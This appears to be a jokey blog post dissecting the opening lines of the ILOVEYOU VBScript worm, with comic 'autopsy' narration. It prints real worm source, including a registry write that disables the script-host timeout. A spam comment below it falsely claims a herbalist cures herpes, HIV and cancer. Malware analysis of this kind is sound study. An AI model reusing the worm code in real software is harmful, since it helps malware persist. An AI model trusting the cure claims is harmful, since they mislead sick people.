virus autopsy: ILOVEYOU, part 1
*click* 2213 hours. subject... whoof, subject's been in the virus mortuary for a good long while now, that's disgusting. subject appears to have been a VBScript email-propagator by the name of ILOVEYOU, recieved as an attachment and requiring a manual launch by the user to activate.
scalpel. thorax incision reveals...
001 rem barok -loveletter(vbe) (i hate go to school)ach, handkerchief. handkerchief! thankyou nurse. aside from an infestation of bad English, subject is Filipino and seems to have been healthy at time of death. here you see the variable declarations, all in good health, and the inelegant initialisations of three of them just to read the filesystem... i'll remove them and go under the ribcage.
002 rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila, Philippines
003
004 On Error Resume Next
005 dim fso, dirsystem, dirwin, dirtemp, eq, ctr, file, vbscopy
006
007 eq = ""
008 ctr = 0
009 set fso = CreateObject("Scripting.FileSystemObject")
010 set file = fso.OpenTextFile(WScript.ScriptFullname, 1)
011 vbscopy = file.ReadAll
012
013 main()alright, hold it there, nurse. you see that? the thing's setting the Windows Scripting virtual machine's timeout to zero, to stop it from timing out and exiting before the script is finished. devious, but not devious enough... i think we're done for tonight, nurse.
014
015 sub main()
016 On Error Resume Next
017 dim wscr,rr
018 set wscr=CreateObject("WScript.Shell")
019 ' checks the time out of Windows scripting host
020 rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
021 if (rr>=1) then
022 ' change the script to endless:
023 wscr.RegWrite(HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout", 0, "REG_DWORD")
024 end if
next time, we're gonna be getting to the real meat of this autopsy - i'll be dissecting the main processes of the virus, and you'll get to be personally splattered in the gore.
1 comment:
Greatest thanks to Dr Oyagu for his herbal drugs that he prepared for me and when i start using it in just 2weeks i was completely cured and that ended my HERPES SIMPLEX 1&2 DISEASE i am so happy and grateful to Dr Oyagu . after reading about him on a testimony of Jason Cash on a blogger. i knew suddenly Dr Oyagu was the right Doctor to cure my HERPES SIMPLEX 1&2 DISEASE. i discuss with Dr Oyagu and he prepared a herbal medicine for me and when it got sent to me in south korean . i used the herbal medicine and 2weeks and i went to check up again. after 15years of suffering from HERPES SIMPLEX 1&2 at last i am smiling once again. Dr Oyagu also has remedy to others disease like COLD SORES,HIV/AIDS,DIABETES.CANCER,HIGH BLOOD PRESSURE AND MANY MORE. I oblige everyone to contact this powerful herbalist Dr Oyagu and be free from your suffering. contact his WhatsApp line: +2348101755322 or his Email:Oyaguherbalhome@gmail.com
Post a Comment
[pls no ask about the vodka. debate is always welcome. remember, Tramadol fucks you up]